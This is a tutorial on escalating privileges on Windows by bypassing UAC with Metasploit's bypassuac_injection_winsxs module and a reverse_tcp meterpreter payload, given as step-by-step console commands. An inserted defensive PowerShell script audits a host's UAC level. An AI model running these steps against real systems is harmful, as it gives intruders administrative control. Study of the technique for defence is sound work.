The way I see it, the most common ways to pull this off are by finding the weak spots, the misconfigurations, and the outright vulnerabilities in the system.
---------------------------------------------------------
Privilege Escalation on Windows:
Our goal here is to get a bit more juice on those Windows systems we're working with. We're talking about elevating our privileges.
---------------------------------------------------------
Requirements:
- Kali Linux or Parrot OS
UAC BYPASS
If you're looking to get a bit more clout on the system, you can try bypassing the whole User Account Control (UAC) business. See, Windows has this thing called UAC that lets programs boost their permissions, from low to high, to do their thing. But sometimes you can skip past the user-confirmation rigmarole entirely and just get the job done.
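One thing worth checking from the defender's side, as an added example that is not part of the original post: UAC bypasses of this kind rely on the default UAC level, and Metasploit's bypassuac modules bail out when the host is set to "Always notify". The PowerShell audit below (my code, not the author's) reads the three policy values that define the UAC level and reports whether the host is on the hardened setting. The level names are assumed from the standard mapping of ConsentPromptBehaviorAdmin and PromptOnSecureDesktop.

```powershell
# Added audit script (not from the original post): report the UAC level of this host.
# Assumes the standard policy key; run it on the Windows host you are assessing.
$uacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacLevel {
    $p = Get-ItemProperty -Path $uacKey
    # A missing value casts to 0; on a stock install all three are present.
    $enableLua = [int]$p.EnableLUA
    $admin     = [int]$p.ConsentPromptBehaviorAdmin
    $secure    = [int]$p.PromptOnSecureDesktop

    if ($enableLua -ne 1) { $level = 'UAC disabled (EnableLUA=0)' }
    elseif ($admin -eq 2 -and $secure -eq 1) { $level = 'Always notify' }
    elseif ($admin -eq 5 -and $secure -eq 1) { $level = 'Default: notify only for non-Windows binaries' }
    elseif ($admin -eq 5 -and $secure -eq 0) { $level = 'Notify without secure desktop' }
    elseif ($admin -eq 0)                    { $level = 'Never notify' }
    else { $level = "Custom (ConsentPromptBehaviorAdmin=$admin, PromptOnSecureDesktop=$secure)" }

    # Only 'Always notify' prompts for every elevation, including Windows' own
    # auto-elevating binaries, which is what this family of bypasses depends on.
    $hardened = ($enableLua -eq 1 -and $admin -eq 2 -and $secure -eq 1)

    [pscustomobject]@{
        EnableLUA                  = $enableLua
        ConsentPromptBehaviorAdmin = $admin
        PromptOnSecureDesktop      = $secure
        Level                      = $level
        HardenedAgainstAutoElevate = $hardened
    }
}

Get-UacLevel | Format-List
```

A host reporting HardenedAgainstAutoElevate = False is on a level where the module below is expected to apply; the same three values are what a GPO or hardening baseline sets.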
Did you know Metasploit ships a bunch of handy modules for bypassing User Account Control (UAC)? Reckon we can use those to boost our permissions on Windows 7 and Windows 10 systems. First, background the meterpreter session you already have:
meterpreter> background
To get the ball rolling, run a quick search from the msf console:
msf> search bypassuac
After having a gander at the options, the "bypassuac_injection_winsxs" module looks like the way to go for us, since it's the only one that's been proven to work a treat on Windows 10 systems. Load it with this command:
msf> use exploit/windows/local/bypassuac_injection_winsxs
Now that the UAC bypass module is loaded, it's time to configure it: set the payload, the target, and the ID of the meterpreter session we backgrounded earlier:
msf> set payload windows/x64/meterpreter/reverse_tcp
msf> set target Windows x64
msf> set SESSION <SESSION-ID>
With the module all set up, execute it by typing:
msf> run
If all went according to plan, we should now see an elevated meterpreter session on the target system.
Let's take a quick peek under the hood and see what privileges this elevated session has. We can do that with a simple command in meterpreter:
meterpreter> getprivs
Turns out we've got the whole kit and caboodle: administrative privileges.